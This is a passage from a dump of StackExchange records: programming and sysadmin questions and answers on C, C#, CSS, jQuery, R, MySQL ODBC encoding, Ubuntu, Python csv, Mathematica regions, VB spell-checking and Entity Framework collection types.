way.\nComment: Perhaps http:\/\/stackoverflow.com\/questions\/2722606\/how-to-parse-a-string-into-a-datetime-struct-in-c or http:\/\/stackoverflow.com\/questions\/12071342\/reading-a-date-with-sscanf will be of some help. Duplicates?\nComment: @JoachimPileborg I see your point, Ill work on this.\nAnswer: \nI am not sure how or if I can scan data into a structure within a\n structure? Do you do data[I].datetime.year?\n\nYes, we do. For example, if your date\/time format is \"YYYY-MM-DD hh:mm:ss\", you can use\n<code>data = Alaska;\n\u2026\n fscanf(FAlaska, \"%d-%d-%d %8s\", &data[i].datetime.year,\n &data[i].datetime.month,\n &data[i].datetime.day, data[i].datetime.time) \u2026\n<\/code>\n","meta":{"source":"stackoverflow","title":"scanning files into nested structures","dup_signals":{}},"subset":"stackexchange"} +{"text":"Delete files which are older than today's date\n\nQuestion: I have some files in the format of \"yyyyMMdd_hhmmss_abc.txt\" in a particular location.\nusing the below code i am able to get all the files with \"_abc.txt\" in that folder. \n<code>fileArray = Directory.GetFiles(@\"C:\/\/Documents\", \"*abc.txt\");\nfor (int i = 0; i < fileArray.Length; i++)\n{\n fileArray[i] = Path.GetFileNameWithoutExtension(fileArray[i]);\n Console.WriteLine(fileArray[i]);\n}\n<\/code>\nBut now I'm thinking of reading the file name, split it and then convert into date time object so that i can check for the condition(older than today's date) and delete them. \n\n<code>for eg: 20160426_045823_abc.txt\n<\/code>\n\nI want to split it into 2016, 04 , 26 and then convert into date time object using \n<code>Datetime d1 = new Datetime(2016,04,26)<\/code> and then do other operations. \nIs there any other way to solve this problem?\nThanks in advance \nComment: Possible duplicate of [Removing files that are older than some number of days](http:\/\/stackoverflow.com\/questions\/1720790\/removing-files-that-are-older-than-some-number-of-days)\nComment: @KenWhite It's not a duplicate. That other question is based on file creation time, and this one is about date-embedded-in-filename.\nAnswer: The following code can be used to get the collection of files having created date less than today's date, A simple iteration over the collection will help you to delete them as well: consider the code\nSimple option:\n<code>foreach (var item in Directory.GetFiles(@\"C:\/\/Documents\", \"*.txt\")\n .Where(x => new FileInfo(x).CreationTime.Date < DateTime.Now.Date))\n{\n File.Delete(item);\n} \n<\/code>\nBased on Filename:\n<code>var fileArray = Directory.GetFiles(@\"C:\/\/Documents\", \"*abc.txt\");\nfor (int i = 0; i < fileArray.Length; i++)\n{\n DateTime fileNameTime;\n string fileName = Path.GetFileNameWithoutExtension(fileArray[i]).Replace(\"_abc\", \" \");\n fileNameTime = DateTime.ParseExact(\"yyyyMMdd_hhmmss\", fileName, CultureInfo.InvariantCulture, DateTimeStyles.None);\n if (fileNameTime.Date < DateTime.Now.Date)\n {\n File.Delete(fileArray[i]);\n }\n}\n<\/code>\n\nPlease note : The best and effective option is the first one, what you need to do is assign the file-name as the dateTime at the time of\n creation of the file(if it is under your control) so that the things\n became easier for you\nComment: Probably want to use CreationTime.Date and DateTime.Now.Date, unless you want to delete all files :)\nComment: @gnalck: thankk you, nice spot. i have updated the answer\nComment: Thanks for the reply :)\ni'm looking for the file name more than the creation time.\nComment: @un-lucky here we are jus comparing if the date is less than todays date. what if i have to check for 5 days older condition? \n\nI tried this:\n\n if (DateTime.Now.Date - d5.Date > TimeSpan.FromDays(5))\n {\n Console.WriteLine(fileArray[i]);\n File.Delete(fileArray[i]);\n }\n\nBut the file is not getting deleted. anything to tweak in here?\nComment: use `DateTime.Now.AddDays(-5).Date` instead for `DateTime.Now`\nAnswer: The filename is already in a sortable format based on the date. Instead of parsing bits of the filename into a DateTime object, why not create a filename based on today's date and filter your array of filenames down to only those that are string-comparison-less than your today's-date filename? It's probably quite a bit faster than doing date parsing on each filename, for large lists of files.\nFor example:\n<code>var path = \"c:\\\\whatever\";\nvar suffix = \"_abc.txt\";\nvar todaysFilename = DateTime.Now.ToString(\"yyyyMMdd_hhmmss\") + suffix;\nvar filesToDelete = Directory.EnumerateFiles(path, \"*\" + suffix)\n .Select(Path.GetFileName)\n .Where(fileName => string.Compare(fileName, todaysFilename, StringComparison.Ordinal) < 0)\n .ToArray();\n\nforeach (var file in filesToDelete)\n{\n File.Delete(Path.Combine(path, file));\n}\n<\/code>\nComment: Thanks for the answer. What if i have to delete files which are 5 days older than today's date? Is it 5 instead of 0 in your code?\nComment: No, the `Compare` function returns a value less than zero when the first argument is less, zero when they're equal, and a value greater than zero when the second argument is less. What you want to do is this: `var todayFilename = DateTime.Now.AddDays(-5).ToString(...)`. That would delete all files more than 5 days old.\nAnswer: You could take the name of the string and do a DateTime.ParseExact.\n<code>String dateString = Path.GetFileNameWithoutExtension(fileArray[i])\nDateTime d5 = DateTime.ParseExact(dateString, \"yyyyMMdd\", CultureInfo.InvariantCulture, DateTimeStyles.None)\nif (d5.Date < DateTime.Now.Date)\n{\n File.Delete(fileArray[i]);\n}\n<\/code>\nThis will take the first 8 characters of the string and parse do an exact parse on it.\nAlso you will probably just want the filename without the path and extension.\nhttps:\/\/msdn.microsoft.com\/en-us\/library\/w2sa9yss%28v=vs.110%29.aspx?f=255&MSPPError=-2147217396\nComment: i think u need to tweak your answer a little bit. \n\nDateTime d5 = DateTime.ParseExact(filename,\"yyyyMMdd\", CultureInfo.InvariantCulture, DateTimeStyles.None);\nComment: If the creation date is the date that you want to compare the other answers are probably better, but if the date in the filename is what you want and not the actual creation date then parsing the date from the string is better.\nComment: Hi Arina.. i tried your method. but it is throwing an error.. \n\"String was not recognized as a valid DateTime.\"\n\nAfter getting the filenames i did this.\n\n DateTime d5 = DateTime.ParseExact(\"yyyyMMdd\", fileArray[i], CultureInfo.InvariantCulture, DateTimeStyles.None);\n Console.WriteLine(d5);\nComment: You will probably have to truncate the filename to get it in to the exact format.\nDateTime d5 = DateTime.ParseExact(\"yyyyMMdd\", fileArray[i].SubString(0, 8), CultureInfo.InvariantCulture, DateTimeStyles.None)\nComment: Hi Arina..is there any reference to be added for stringtool? because it shows no potential fixes for the same. TIA\nComment: Sorry, I meant to Substring, was just copy and pasting from some code.\nAnswer: You can get the DateTime a file was created like this\n<code>DateTime time = File.GetCreationTime(fileName);\n<\/code>\nYes it's that easy.\nComment: hi JSON. When i tried this code, why is it showing 1\/1\/1601 8:00:00 AM as the creation date. Is there anything else i need to do\/\nComment: Your fileName is probably not correct. Make sure you include the entire path. If you like my answer mark as answered and thumps me up\n","meta":{"source":"stackoverflow","title":"Delete files which are older than today's date","dup_signals":{}},"subset":"stackexchange"} +{"text":"XOR PSK with random buffer\n\nQuestion: I need some guidance here:\nassuming I have the following:\n(PreSharedKey of 32 bytes) XOR (one time Random Buffer of 32 bytes)\nThe only way to crack this should be brute forcing, correct? One of the issue in sending out the XORed value is to disclose the PSK length. At this point I could add some random bytes at the end of the XORed value to avoid this (the two ends knows the real PSK len). But does it make sense? Or it would be better to just increase the PSK (and the random buffer) length of the same number of bytes to get more security?\nSorry for the newbie question...\nThanks,\nComment: Newbe questions are alright, but I'm not sure we can answer it as it stands. If you XOR something with a fully random value then nothing can be brute forced. Leaking the size of a key is generally not an issue. 32 bytes \/ 256 bits of key material should be plenty to secure anything, so extending it doesn't make sense. So all in all, I haven't got an inkling of what you are trying to ask or even protect.\nComment: @MaartenBodewes I think the OP tries to send a 32 bytes random as AES-256 key.\nComment: Well, you can only do that one time, as any key leaking will also expose all the other keys, so you might as well use just one key. And in that case, it might just as well be the pre-shared key itself. So I still don't get it. Of course, brute forcing something that is really an OTP makes no sense.\nAnswer: \nOne of the issue in sending out the XORed value is to disclose the PSK length\n\nThis is only an issue if you consider the length of the PSK to be a secret and not just the value. In that case you probably should redesign your system to not depend on the length of the PSK being secret, e.g. by always sending an upper-length PSK and also sending the amount of bytes used if you need secret variable length.\n\nThe only way to crack this should be brute forcing, correct?\n\nAssuming an adversary only gets to see $K\\oplus B$ with $K$ being your PSK and $B$ being the one-time buffer, this is a one-time pad and an adversary cannot infer anything about the PSK they didn't already know. In particular an adversary cannot infer the concrete value. However this guarantee is void if the same buffer $B$ is used more than once - even with the same key as then the adversary knows the key has been re-used which you may or may not want to leak. And of course note that receiver of this value also has to know $B$ which at this point becomes a one-time-use PSK itself which begs the question why one doesn't use $B$ as the key directly potentially with a more standard symmetric key-exchange protocol to get a fresh session key - which can be as simple as encrypting a monotonic counter and a new key under the PSK.\n","meta":{"source":"crypto.stackexchange","title":"XOR PSK with random buffer","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get the title of a product (Woo-Commerce) to show up in white text\n\nQuestion: I'm new to wordpress, html, and all so I'm learning slowly but surely. Currently while working on a website for my business, the shop page has 6 items listed but none of the titles of the items are listed. Only the picture themselves. The background and text color of the titles are both #222222. I'm trying to change the text color of the title which is <code>h2<\/code>. The name of the header is <code>h2.woocommerce-loop-product_title<\/code> as seen in the inspector. \nNone of the code I've tried has worked so how would I properly reformat the text color?\nhttp:\/\/middlesexworms.com\/index.php\/shop\/\n\nCode I've tried:\n<code>h1,\nh2,\nh3,\nh4,\nh5,\nh6{\n font-family: 'Krub', sans-serif;\n margin:0;\n padding:10px 0;\n color: #FFFFFF;\n font-weight: bold;\n}\n<\/code>\nComment: The code you have tried will override all the heading elements which is not what you would want :)\nAnswer: You need to edit this class:\n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color: #ffffff;\n letter-spacing: 1px;\n margin-bottom: 10px !important;\n}\n<\/code>\nOld class is :\n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color: #0000;\n letter-spacing: 1px;\n margin-bottom: 10px !important;\n}\n<\/code>\nSo i change color from <code>#000000<\/code> to <code>#fffffff<\/code>\nComment: He might need to add `!important` based on different situations in WordPress. He can try adding a parent element `woocommerce-loop-product__link` to increase the specificity in that case. To override.\nComment: no need to add `!important`, I try in live wwebsite and work good\nAnswer: You can change color by navigating to style.css file of the theme. I hope you can access that file through FTP client. Login to your server using FTP or cPanel go to your webiste setup root then \/wp-content\/themes\/vw-gardening-landscaping\/style.css. Go on line #1272 and change color property to #fff.\nIf you don't have access login to wp-admin navigate to appearance > editor. There you can see the sytle.css change the property on line #1272 to #fff\nI know this is not standard practice to edit theme's core file but if you couldn't enqueue your own stylesheet or not created child theme you have to do this. \nYou can enqueue your own stylesheet setting dependency as theme's style.css and over write the rules as \n<code>h2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\ncolor: #fff !important; }\n<\/code>\nLet me know if you wish further assistance.\nAnswer: Before I saw your answers, i did a ton of googling. Seems as though there are a lot of ways to fix it but this one was what I used:\n<code>h1,\nh2,\nh3,\nh4,\nh5,\nh6{\n font-family: 'Krub', sans-serif;\n margin:0;\n padding:10px 0;\n color: #FFFFFF;\n font-weight: bold;\n}\n\nh2.woocommerce-loop-product__title, .woocommerce div.product .product_title {\n color:#FFFFFF;\n letter-spacing:1px;\n margin-bottom:10px !important;\n}\n<\/code>\n","meta":{"source":"stackoverflow","title":"How to get the title of a product (Woo-Commerce) to show up in white text","dup_signals":{}},"subset":"stackexchange"} +{"text":"JavaScript - function is not defined\n\nQuestion: I've been stuck with this for hours now. I think it's time for some new eyes on the code. I'm pretty new to JavaScript so I could have certainly overlooked some detail. I should note that other functions are working properly. \nI'm creating rows in a table dynamically and a few of the cells contain SELECT elements. Here is the script (just the portions where I am having trouble):\n<code>case 2:\n newcell.innerHTML = \"<select id='size\" + pid + \"' class='ad_size' \\\n onChange='updateSubtotal()'> \\\n <option value='0'>Full<\/option> \\\n <option value='1'>Half<\/option> \\\n <option value='2'>Quarter<\/option> \\\n <option value='3'>Eighth<\/option> \\\n <option value='4'>Directory<\/option> \\\n <\/select>\";\n break;\n<\/code>\nand the basic function where I am just trying to log whether or not it is being called properly:\n<code>function updateSubtotal() {\n console.log(\"size changed\");\n return true;\n}\n<\/code>\nIt is probably helpful to add that I originally tried doing this with jQuery .change and it was also not working:\n<code>$(\".ad_size\").change(function(){\n console.log(\"size changed\");\n});\n<\/code>\nAny dumb error you can see?\nComment: change console.log to alert and see what happens - I dumped your code into a fresh page and it's happy with an alert\nAnswer: Since you are adding the element dynamically try using <code>delegate<\/code> to attach event handler.\n<code>$('tableSelector').delegate('.ad_size', 'change', function(){\n console.log(\"size changed\");\n});\n<\/code>\nOr use <code>on<\/code> if you are using jQuery 1.7+\n<code>$('tableSelector').on('change', '.ad_size', function(){\n console.log(\"size changed\");\n});\n<\/code>\nComment: .delegate (1.4+) or .on(1.7+) would be the appropriate way to do this with current versions of jQuery.\nAnswer: try:\n<code> $(document).ready(function(){\n $(\".ad_size\").live('change',function(){\n console.log(\"size changed\");\n });\n });\n<\/code>\nComment: `.on` wouldn't make any difference like that.\nComment: wow thank you. .on did not work, but .live worked like a charm.\nComment: .live should not be used with jQuery 1.7+. You should be using .on() with the example shown in the answer by @ShankarSangoli. Not that you should attach this to document, but you can achieve the exact same effect as .live by doing $(document).on(\"change\", \".ad_size\", function() { ... });\n","meta":{"source":"stackoverflow","title":"JavaScript - function is not defined","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to assign list key with value in for loop in R\n\nQuestion: <code>lista = vector(mode = 'list', length =2)\nlistname = c(0.1,0.2)\nnames(lista) = listname\nfor (i in listname){lista[[i]] = i}\n<\/code>\n\nError in lista[[i]] <- i : \n attempt to select less than one element in integerOneIndex\n\nI want to get a list with key = (0.1,0.2) and assign value to those keys in a for loop \nComment: What value do you want to assign to list elements? Can you show your expected output?\nComment: Try `for (i in 1:length(listname)){lista[[i]] = i}`\nAnswer: I agree with @RonakShah's comment in that it's not very clear what you're trying to do.\nI assume that\n\nyou have a <code>list<\/code> (called <code>lista<\/code>) with a k <code>NULL<\/code> elements, and\nyou have a <code>numeric<\/code> vector (called <code>listname<\/code>) with k elements.\n\nI further assume that you're trying to (1) name every <code>lista<\/code> element with names given in <code>listname<\/code>, and (2) replace every <code>NULL<\/code> element with the corresponding entry from <code>listname<\/code>.\nYou can do this in one step using <code>Map<\/code> and <code>setNames<\/code>:\n<code>setNames(Map(c, lista, listname), listname)\n#$`0.1`\n#[1] 0.1\n#\n#$`0.2`\n#[1] 0.2\n<\/code>\n\nSample data\n<code>lista <- vector(mode = \"list\", length = 2)\nlistname <- c(0.1, 0.2)\n<\/code>\nComment: Awesome! this is exactly what I was trying to achieve!\nComment: You're very welcome @Amy. Since you're new around here, please consider closing the question by setting the green check mark next to the answer. That way you help keeping SO tidy and make it easier for others to identify relevant posts. It also provides a small reputation bonus to both the question poster and answerer. Thanks and welcome to Stack Overflow!\nComment: Done. Thanks for the orientation.\n","meta":{"source":"stackoverflow","title":"How to assign list key with value in for loop in R","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why is the property of an inner div not being applied?\n\nQuestion: I'm very new to web-dev, so please bear with me. I am using Jekyll to generate my webpage. So I created some custom classes, and specified the <code>css<\/code> properties in the corresponding <code>_sass<\/code> file.\nThe following are the two classes which are relevant to the question:\n<code>.quote{\n width: 100%;\n margin: auto;\n text-align: center;\n background-color: #171717;\n font-size: 25px;\n padding: 10px;\n\n &.author{\n width: 50%;\n float: right;\n font-size: 20px;\n color: red;\n padding: 10px;\n }\n }\n<\/code>\nThis is the css code generated by <code>Jekyll<\/code>:\n<code>section .quote { width: 100%; margin: auto; text-align: center; background-color: #171717; font-size: 25px; padding: 10px; }\n\nsection .quote.author { width: 50%; float: right; font-size: 20px; color: red; padding: 10px; }\n<\/code>\nThe following is the relevant HTML code:\n<code><div class=\"quote\">\n\n <div id=\"randomquote\">\n Hello there, this is supposed to show a quote.\n <\/div>\n\n <div class=\"author\">\n This should be the author's name.\n <\/div>\n\n<\/div>\n<\/code>\nHowever, the properties of <code>author<\/code> class are not applied to the inner div. Rather it has the properties corresponding to <code>quote<\/code>. Why is that? Am I missing something? \nPlease note that I intend to use <code>author<\/code> inside <code>quote<\/code>. \nAnswer: Add a space between your <code>&<\/code> and <code>.author<\/code> in CSS. See here:\nhttps:\/\/jsfiddle.net\/y4j6ua1r\/1\/\nAlso in your generated code, there should be a space between <code>.quote<\/code> and .<code>author<\/code> See here:\nhttps:\/\/jsfiddle.net\/y4j6ua1r\/2\/\n","meta":{"source":"stackoverflow","title":"Why is the property of an inner div not being applied?","dup_signals":{}},"subset":"stackexchange"} +{"text":"String with accents in MySQL table returned as NA in R (RODBC)\n\nQuestion: I have a table called 'segments' stored in a MySQL database. The table is UTF-8 encoded (charset utf8, collation utf8_general_ci), and the column 'label' contains strings with accents, like \"Fid\u00e8les\", \"Arr\u00eat\u00e9s\", etc.\nI query that table using R, and the RODBC package, with a simple:\n<code>data = sqlQuery(channel = myodbcconnection, query = \"SELECT label FROM segments\")\n<\/code>\nDoing so will result in all strings containing accents being replaced with NA values. It's not only the accents being replaced by filling characters. The entire string becomes NA.\n\nRunning the query from MySQL Workbench returns the correct strings, so the table is fine\nR files are utf-8 encoded, sourced with utf-8 encoding, etc.\nThe ODBC connection uses a MySQL ODBC UNICODE Driver\n\nWhat's even weirded is that if I run an UPDATE on the database from R, with something like:\n<code>sqlQuery(channel = myodbcconnection, query = \"UPDATE segments SET label = 'Test\u00e9 et approuv\u00e9' WHERE id = 70\")\n<\/code>\nThe database is updated correctly. But if I select it back, it returns an NA value.\nThis is driving me crazy. ;-) Any help would be greatly appreciated.\nComment: I tried will all combinations of `as.is` and `stringAsFactors` (just in case), to no avail.\nComment: I should also add that when I create my ODBC connection with `odbcConnect`, I specify `DBMSencoding = \"UTF-8\"`\nAnswer: After much pain, I found a partial answer to my own question.\nThe problem was, as expected, with the ODBC connection, and the way it coded utf8 communications. In the ODBC connection string, you have to specify CharSet=utf8. For instance:\nDriver={MySQL ODBC 3.51 Driver};Server=localhost;Database=myDataBase;\nUser=myUsername;Password=myPassword;Option=3;CharSet=utf8;\nNote that:\n\nIt is not enough to select the ODBC Unicode (utf8-compatible) driver.\nSpecifying \"DBMSencoding\" as utf8 in the odbcConnect function was not sufficient either.\nThis fixed the issue on my localhost, but not in my production environment (Ubuntu\/AWS), for unknown reason.\n","meta":{"source":"stackoverflow","title":"String with accents in MySQL table returned as NA in R (RODBC)","dup_signals":{}},"subset":"stackexchange"} +{"text":"Error message at startup\n\nQuestion: I just installed Ubuntu on my Gateway NE56R41u yesterday. Infact, it dual-boots with Windows 8.1 UEFI, but that has nothing to do with my problem. However, when I turn on my computer, I get an error message that displays for about a second. I don't know what it means, though and it displays for less than a second. Tell me, does it mean anything important? How do I fix it? Also, regardless of if it's important or not or if it is fixable, how can I prevent the message from displaying when I turn my computer on? The error is below:\n<code>[10.987] info @wl_cfg80211_attach CFG80211 Phy\n<\/code>\nAnswer: Overall, that is just a report that it issues while it hasn't loaded the boot screen, if you press any of the f(#) buttons you will see the boot log, and you will see a lot more of those. It is not an error, it is just a report in the log that it successfully loaded a particular sector\/file. There really is no way to remove it, as it is just what is in the background while the system boots\nComment: sorry it is impossible to remove, I generally just like it. I disable \"quiet boot\" in the grub boot option so it displays the whole log, that way if I DO get an error I can see it, plus it gives me a sense of nostalgia having text fly by me on a computer screen :P\nComment: I get that too (http:\/\/askubuntu.com\/questions\/431339\/12-04-info-message-on-black-screen-during-boot-wifi-works-fine) it has something to do with the wireless adapter. Have not found a way to get rid of it yet.\nComment: as I said, though, it is just a report that it found it, not really something you can remove safely because the log is there for a LOT of diagnostic purposes, and really shouldn't be hidden or removed permanently\n","meta":{"source":"askubuntu","title":"Error message at startup","dup_signals":{}},"subset":"stackexchange"} +{"text":"How can I check if a string given is a real word?\n\nQuestion: I am making a program that solves anagrams in Visual Basic. How can I check if a string given by the anagram solver is a real word? I know I will have to access some sort of dictionary but I have no idea how to do this?\nI need a function that checks the word to return a true\/false boolean value. Is this possible?\nI'm using Visual Basic in Microsoft's VS2015.\nComment: Of course this is possible, but given you haven't said what you've tried so far, or even what format the dictionary will be in, it will be difficult to help you.\nComment: @Carcigenicate So far I've got the code that generates the random string of letters (see below) however I have no idea how dictionaries work in Visual Basic and so that's what I'm also asking for help in. What format would you recommend?\nComment: `Dim lettersgiven() As Char = {\"a\"c, \"b\"c, \"d\"c, \"e\"c, \"f\"c}\nDim results As New List(Of String)\nFor start As Integer = 0 To lettersgiven.Length - 1\nDim usedindices As New List(Of Integer)\nFor j As Integer = 1 To lettersgiven.Length\nDim i As Integer = start\nWhile usedindices.Contains(i)\n i = (i + 1) Mod lettersgiven.Length\nEnd While\nusedindices.Add(i)\nNext\nDim sb As New System.Text.StringBuilder()\nFor Each i As Integer In usedindices\nsb.Append(lettersgiven(i))\nNext\nIf LookupDictionary(sb.ToString()) Then results.Add(sb.ToString())\nNext`\nComment: Have you thought of making requests to some free dictionary API's?\nComment: http:\/\/stackoverflow.com\/q\/2213607\/1043824 gives a file with lots of words. You can search through it to check for existance. Searching is tough in flat files. You may want to put it in a database and sql search it. Hitting an api is a neat idea, but i guess it is over the high water mark.\nComment: @gdrt94 thanks for your answer. I'll try that out and get back to you.\nComment: @inquisitive thank you!\nComment: Check http:\/\/www.dictionaryapi.com\/products\/api-collegiate-dictionary.htm\nComment: One solution is to check your word has no spaces first then use one of the myriads of spell checking examples. If it comes back as an error...it is not a real word. However, spell checking is not that easy either for a newb.\nComment: Btw if you are using WPF the spell check part is easy. If you are using windows forms I suggest you create and use a WPF control on your form.\nAnswer: Hunspell is pretty easy to use.\n\nInstall the .net-library through Nuget (open your project in Visual Studio, then > Extras > Nuget-Package-Manager -> Console, type <code>Install-Package NHunspell<\/code>)\nDownload the .aiff and .dic files, see the dictionaries link on the Hunspell project page. Include these files in your project or use absolute paths.\n\nSample Code:\n<code>Private Sub TextBox1_TextChanged(sender As Object, e As EventArgs) Handles TextBox1.TextChanged\n Using h As New NHunspell.Hunspell(\n \"...path ...\\en_US.aff\",\n \"...path ...\\en_US.dic\")\n Me.TextBox1.BackColor = If(h.Spell(Me.TextBox1.Text),\n Color.PaleGreen, Color.PeachPuff)\n End Using\nEnd Sub\n<\/code>\nHunspell \n.net library NHunspell \nNHunspell C# Code Samples\nAnswer: If your are using WPF then checking if a word in a textbox can be done simply by checking if it has a spelling error.\n<code>Public Function WordOk(Word As String) As Boolean\n return TextBox1.GetNextSpellingErrorCharacterIndex(0, Windows.Documents.LogicalDirection.Forward) < 0 \nEnd Function\n<\/code>\nIf you are using windows forms then you can create a \"User Control (WPF)\" to do the same thing, though it is a bit tricky to explain how to do that here.\n(There may be a better test than the one I showed though.. I'm not overly familiar with WPF)\n","meta":{"source":"stackoverflow","title":"How can I check if a string given is a real word?","dup_signals":{}},"subset":"stackexchange"} +{"text":"Unable to connect to wifi on 16.04\n\nQuestion: About a week ago, I upgraded to 16.04 and ever since then, my computer doesn't seem to connect to wifi. I have Windows 10 on another partition, and that connects just fine. LAN connects fine too.\nHere's what shows under Network - No Wifi option! When I do <code>nm-tool<\/code>, it says \n<code>No command 'nm-tool' found, did you mean:\n Command 'dm-tool' from package 'lightdm' (main)\nnm-tool: command not found\n<\/code>\nI try tethering from my phone, that doesn't work too. FYI, it worked like a charm before the update!\nPlease, can you help me?!\nAnswer: Try nmtui \nnmtui \u2014 Text User Interface for controlling NetworkManager\nnmtui [edit | connect | hostname] [...] \nnmtui-edit [connection-id | connection-name] \nnmtui-connect [connection-name | connection-uuid | device-name | Wi-Fi-SSID] \nnmtui-hostname\nComment: Ok, what am I supposed to be looking at in this? Anything in particular? The options it gives me are pretty much the same as the regular UI (under System Settings)\nComment: Any help, anyone?\n","meta":{"source":"askubuntu","title":"Unable to connect to wifi on 16.04","dup_signals":{}},"subset":"stackexchange"} +{"text":"best way to index by value of the header in a 2d list\n\nQuestion: This solution sort of works but is extremely ugly:\nFinding the index of an item given a list containing it in Python\n<code>rowIndex = 3\nsheet = list(csv.reader(open('ObserverLog.csv'))) \nprint sheet[rowIndex][sheet[0].index(\"Message sent? (Y\/N)\")] \n<\/code>\nIt seems like there ought to be a way to make it work like this:\n<code>print sheet[rowIndex][\"Message sent? (Y\/N)\"] \n<\/code>\nAnswer: <code>DictReader<\/code> will read each row as a dictionary:\n<code>list(csv.DictReader(open('ObserverLog.csv')))\n<\/code>\nReturns a list of dictionary, so\n<code>sheet[rowIndex][\"Message sent? (Y\/N)\"] \n<\/code>\nwould work.\nComment: This works well enough. not totally what I wanted but it is exactly what I asked for. haha. An unanticipated consequence of this is I can't reference by index anymore. but that's OK.\nComment: @gnarbarian Well if you really want to have all the power you can try using pandas, which is great :-)\n","meta":{"source":"stackoverflow","title":"best way to index by value of the header in a 2d list","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to get a membership condition for RegionBoundary using RegionMember\n\nQuestion: This is my first question on this forum, but by no means my first problem with Mathematica (which I've been using daily for years).\nConsider\n<code>Clear[x, y]\nreg = RegionBoundary[ImplicitRegion[0 < x < 2 \\[And] 0 < y < -2 x + 4, {x, y}]];\n<\/code>\nIn Mathematica 10.3, the expression\n<code>RegionMember[reg, {x, y}]\n<\/code>\nevaluates to the following logical condition\n<code>(x | y) \\[Element] Reals && ((x == 0 && \n 0 <= y <= 4) || (0 < x < 2 && (y == 0 || y == 4 - 2 x)) || (x == \n 2 && y == 0))\n<\/code>\nwhich is correct. However, since version 12 (at least) the result is not a symbolic condition anymore, but a RegionMemberFunction expression.\nHow can one get the predicate above or something equivalent?\nComment: `CylindricalDecomposition[0<x<2&&0<y<-2 x+4,{x,y},\"Boundary\"]\/\/Simplify`\nComment: RegionMember gives logical condition for implicit regions, so I thought to try RegionConvert[reg,\"Implicit\"]. But that doesn't evaluate. Alternatively, first converting to mesh with Chop[RegionConvert[DiscretizeRegion[reg], \"Implicit\"]] gives the full region, not the boundary.\nComment: @chyanog Consider making your comment into an answer\nComment: I don't even get a `RegionMemberFunction` in MMA 12.0, I just get the expression returned unevaluated.\nAnswer: <code>cond = CylindricalDecomposition[0 < x < 2 && 0 < y < -2 x + 4, {x, y}, \"Boundary\"\n ] \/\/ Simplify\n<\/code>\n\n(x == 0 && y >= 0 && 2 x + y <= 4) || (0 <= x && ((y == 0 && x <= 2) || (2 x + y == 4 && x < 2)))\n\n<code>RegionPlot[ImplicitRegion[cond, {x, y}], Frame -> False]\n<\/code>\nComment: chyanog, thank you very much for the answer, especially for bringing attention to CylindricalDecomposition and its topological powers acquired in version 11.2 (which I had forgotten about!).\nComment: @GregosTroianosEducacional It's my pleasure.\n","meta":{"source":"mathematica.stackexchange","title":"How to get a membership condition for RegionBoundary using RegionMember","dup_signals":{}},"subset":"stackexchange"} +{"text":"Why use ICollection and not IEnumerable or List on many-many\/one-many relationships?\n\nQuestion: I see this a lot in tutorials, with navigation properties as <code>ICollection<T><\/code>.\nIs this a mandatory requirement for Entity Framework? Can I use <code>IEnumerable<\/code>?\nWhat's the main purpose of using <code>ICollection<\/code> instead of <code>IEnumerable<\/code> or even <code>List<T><\/code>?\nComment: So the answer is, it is NOT mandatory to use ICollection. and I can use IEnumerable if iteration is al I want. right?\nAnswer: Usually what you choose will depend on which methods you need access to. In general - <code>IEnumerable<><\/code> (MSDN: http:\/\/msdn.microsoft.com\/en-us\/library\/system.collections.ienumerable.aspx) for a list of objects that only needs to be iterated through, <code>ICollection<><\/code> (MSDN: http:\/\/msdn.microsoft.com\/en-us\/library\/92t2ye13.aspx) for a list of objects that needs to be iterated through and modified, <code>List<><\/code> for a list of objects that needs to be iterated through, modified, sorted, etc (See here for a full list: http:\/\/msdn.microsoft.com\/en-us\/library\/6sh2ey19.aspx).\nFrom a more specific standpoint, lazy loading comes in to play with choosing the type. By default, navigation properties in Entity Framework come with change tracking and are proxies. In order for the dynamic proxy to be created as a navigation property, the virtual type must implement <code>ICollection<\/code>.\n\nA navigation property that represents the \"many\" end of a relationship must return a type that implements ICollection, where T is the type of the object at the other end of the relationship. -Requirements for Creating POCO ProxiesMSDN\n\nMore information on Defining and Managing RelationshipsMSDN\nComment: @TravisJ: `List` has a `GetEnumerator()` method, separate from its implementation of `IEnumerable`, which returns a mutable structure type `List.Enumerator`. In most contexts, that type will yield slightly better performance than would a standalone heap object. Compilers which duck-type enumerators (as both C# and vb.net do) can take advantage of this when generating `foreach` code. If the `List` is cast to `IEnumrable` before the `foreach`, the `IEnumerable.GetEnumerator()` method will return a heap-allocated object, rendering the optimization impossible.\nComment: so, with that, `List` should be a lot better, yeah?\nComment: @JanCarloViray - I tend to use `List` a lot. Although it has the most overhead it provides the most functionality.\nComment: With regard to your edit, restricting a property to an interface type is not about memory but about encapsulation. Consider: `private IEnumerable _integers = new List { 1, 2, 3 };` uses the same memory as `private List _integers = new List { 1, 2, 3 };`\nComment: Lists are defined more by their indexers than by the ability to sort them (having an integer indexer makes it easy to sort something, but it's not a requirement).\nComment: @phoog - Yes, they are available to be indexed through `ListName[i]` which can be very handy. The sort is built in.\nComment: The sort is built in to the `List` type, true, but that's more of an \"extra\". For example, the `IList` interface doesn't have a `Sort()` method.\nComment: @phoog - I am going to have to disagree with you there. Your example is flawed in that you are wrapping a `List` with an `IEnumberable` which is rather pointless. Just leave it as a List, you already took the hit! The point I was making of a small footprint in memory is that most `IEnumberable` implement a deferred execution (your example just explicitly makes that execution to be at the time of definition).\nComment: @TravisJ I am not wrapping a list in an IEnumerable, I am *referencing* a list *as* an IEnumerable. Replace `IEnumerable` in my example with `ICollection` (which means we're no longer confused by the possibility of using linq queries). How does that use any less memory than `List`?\nComment: @phoog - I am not sure there is much difference between Collection and List. However, I believe there is a difference between those two and IEnumerable. This difference lies in the iterator. In the more complex collections (List and Collection) I believe they use a reference type whereas IEnumberable uses a mutable struct (to increase performance).\nComment: let us [continue this discussion in chat](http:\/\/chat.stackoverflow.com\/rooms\/9977\/discussion-between-phoog-and-travis-j)\nComment: `IEnumarable` is **not thread safe** either so by using it next to async methods is somekind of violation on it its own. The problem is that every thread that iterates on IEnumarable executes the backing query and if the context is closed on the main thread, and already enumerated object in another thread, fails to enumerate in this thread. ICollection holds your nongeneric data enumerated, so after Linq-to-SQL has executed there is no point in passing IEnumarble up the 